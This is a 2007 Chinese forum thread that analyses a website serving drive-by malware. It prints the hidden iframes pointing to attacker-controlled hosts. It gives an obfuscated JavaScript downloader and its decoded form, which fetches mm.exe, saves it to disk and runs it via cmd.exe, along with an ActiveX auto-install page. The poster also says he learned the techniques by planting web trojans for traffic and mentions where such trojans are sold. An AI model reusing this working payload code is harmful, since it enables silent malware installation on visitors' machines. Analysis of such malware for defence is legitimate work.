www.11sss.com 毒网分析！

xqiafl

如果你打了补丁了，可以直接打开网站，不用担心会发生什么事情！

直接从网页源文件里面就可以找到一个挂站代码：<iframe src="http://pop.wzxqy.com/444/index.htm" width="20" height="0" frameborder="0"></iframe>

再进一步查看里面的东西，发现了四个网址：

<iframe src="http://cc.wzxqy.com/tt/index.htm" width="20" height="0" frameborder="0"></iframe>

(http://cc.wzxqy.com/tt/1.gif

这个不用说了吧！ ANI马  

<iframe src="http://cc.wzxqy.com/wm/index.htm" width="20" height="0" frameborder="0"></iframe>

<script language=javascript src=1.js></script>

dns马 且加密  木马地址可以在下面代码中看出：http://cc.wzxqy.com/wm/mm.exe

<iframe src="http://xx.wzxqy.com/wm2/index.htm" width="20" height="0" frameborder="0"></iframe>

cab挂马，但无任何效果！

<iframe src="http://a.wzxqy.com/wm/index.htm" width="20" height="0" frameborder="0"></iframe>

这个查不出来，通过，网页源码件可以看出来，但都是分开写的。一开始不知道，这是什么了东西，

把网马代码显原型后，就得知了，这是控件马。无任何中马率！  控件马的优点再于，可以不管打没打补丁，只

要没禁止 末签名标签下载，那么是可以中的，但默认就是禁止的，所以不可能中招！ 换句话说，以上四个马，

其实只有二个马

可以中招！ 一个ANI，一个DNS！

DNS加密代码：

function cZRfe(f9mmh2){var mECH63=Math.random()*f9mmh2;return'\x7E\x74\x6D\x70'+Math.round(mECH63)+'\x2E\x65\x78\x65';}try{var s5uMT2="\x68\x74\x74\x70\x3A";r5uMT2="\x2F\x2F";q5uMT2="\x63\x63\x2E\x77\x7A\x78\x71\x79\x2E\x63\x6F\x6D\x2F\x77\x6D\x2F\x6D\x6D\x2E\x65\x78\x65";h2Sfe=s5uMT2+r5uMT2+q5uMT2;BZRfe="\x6F\x62\x6A\x65\x63\x74";yZRfe="\x63\x6C\x61\x73\x73\x69\x64";zZRfe="\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36";EZRfe="\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D";CckvV1="\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74";n2Sfe=(window["\x64\x6F\x63\x75\x6D\x65\x6E\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74"](BZRfe));n2Sfe["\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65"](yZRfe,zZRfe);var t9mmh2=n2Sfe["\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74"]("\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58"+"\x4D"+"\x4C"+"\x48"+"\x54"+"\x54"+"\x50","");var S=n2Sfe["\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74"](EZRfe,"");S["\x74\x79\x70\x65"]=1;t9mmh2["\x4F\x70\x65\x6E"]("\x47\x45\x54",h2Sfe,0);t9mmh2["\x53\x65\x6E\x64"]();tedHp3=cZRfe(10000);var F=n2Sfe["\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74"](CckvV1,"");var AtAMT2=F["\x47\x65\x74\x53\x70\x65\x63\x69\x61\x6C\x46\x6F\x6C\x64\x65\x72"](0);tedHp3=F["\x42\x75\x69\x6C\x64\x50\x61\x74\x68"](AtAMT2,tedHp3);S["\x6F\x70\x65\x6E"]();S["\x57\x72\x69\x74\x65"](t9mmh2.responseBody);S["\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65"](tedHp3,2);S["\x43\x6C\x6F\x73\x65"]();var Q=n2Sfe["\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74"]("\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","");RokwV1=F["\x42\x75\x69\x6C\x64\x50\x61\x74\x68"](AtAMT2+'\\\x73\x79\x73\x74\x65\x6D\x33\x32','\x63\x6D\x64\x2E\x65\x78\x65');Q["\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65"](RokwV1,'\x20\x2F\x63\x20'+tedHp3,"",open,0);}catch(c9mmh2){c9mmh2=1;}  

解必代码：

function cZRfe(f9mmh2){var mECH63=Math.random()*f9mmh2;return'~tmp'+Math.round(mECH63)+'.exe';}try{var s5uMT2="http:";r5uMT2="//";q5uMT2="cc.wzxqy.com/wm/mm.exe";h2Sfe=s5uMT2+r5uMT2+q5uMT2;BZRfe="object";yZRfe="classid";zZRfe="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";EZRfe="Adodb.Stream";CckvV1="Scripting.FileSystemObject";n2Sfe=(window["document"]["createElement"](BZRfe));n2Sfe["setAttribute"](yZRfe,zZRfe);var t9mmh2=n2Sfe["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=n2Sfe["CreateObject"](EZRfe,"");S["type"]=1;t9mmh2["Open"]("GET",h2Sfe,0);t9mmh2["Send"]();tedHp3=cZRfe(10000);var F=n2Sfe["CreateObject"](CckvV1,"");var AtAMT2=F["GetSpecialFolder"](0);tedHp3=F["BuildPath"](AtAMT2,tedHp3);S["open"]();S["Write"](t9mmh2.responseBody);S["SaveToFile"](tedHp3,2);S["Close"]();var Q=n2Sfe["CreateObject"]("Shell.Application","");RokwV1=F["BuildPath"](AtAMT2+'\\system32','cmd.exe');Q["ShellExecute"](RokwV1,' /c '+tedHp3,"",open,0);}catch(c9mmh2){c9mmh2=1;}

控件马代码：

<!DOCTYPEHTMLPUBLIC"-//W3C//DTDHTML4.0Transitional//EN">
<HTML><HEAD>
<METAhttp-equiv=Content-Typec>
<SCRIPTlanguage=javascript>
run_exe="<OBJECTID=\"RUNIT\"WIDTH=0HEIGHT=0TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"3.exe#version=1,1,1,1\">"
run_exe+="<PARAMNAME=\"_Version\"value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1></H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</SCRIPT>

<METAcname=GENERATOR></HEAD>
<BODY>
<palign="center">网马测试...
<BR>
<CENTER></CENTER><BR>
<BR></BODY></HTML>

[ 本帖最后由 xqiafl 于 2007-8-26 17:25 编辑 ]

woai_jolin

lz教一哈蛮
你是怎么分析出来的
有没有教程

FBAV

调用CMD是普通网码
像3721以前在线安庄的是控件马

xqiafl

这个不需要教程吧！！ 玩马必备知识！

以上网马名称不是乱说的，我都是经过对比的，控件马，二个月以前，我玩过，

黑鹰里面就有下载， 网上的DNS马就是这种样子的，我对比过了！第四个马本就是在线安装的。

可以去网上查下子！

[ 本帖最后由 xqiafl 于 2007-8-26 17:29 编辑 ]

xxl

大蜘蛛报
C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\LRWJIG69\1[1].gif - infected with Exploit.ANIFile
微点报
木马名称:Trojan-PSW.Win32.Delf.dvh
程序:
C:\DOCUMENTS AND SETTINGS\ADMIN\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\LRWJIG69\3[1].EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

[ 本帖最后由 xxl 于 2007-8-26 17:39 编辑 ]

woai_jolin

如果有的话
帮忙给哈连接
这些东西太有用了

xqiafl

呵呵！！ 这些都是，这二个月，玩网马时，总结出来的经验，网上是没这分析网马教程的。

说白了，就是查源码，然后，再看是什么马， 黑鹰的地址：www.3800hk.com/index.html

这里有控件马下，很多人都拿出来卖钱！ 把他说成是传说中的过全补丁马！

woai_jolin

你在那学的这些知识

xqiafl

自学的。 一开始，就是学挂马，因为，别人让我帮他收流量挂马，

所以，没办法，又自己学了下挂马，世面的网马基本上都玩过了。

所以代码都清楚，这个只要会看网马，会查源代码，就行了。没什么技术含量的。

可以去我的空间看看！ 空间地址就发在，  中马率真实性分析这里了。

woai_jolin

Thanks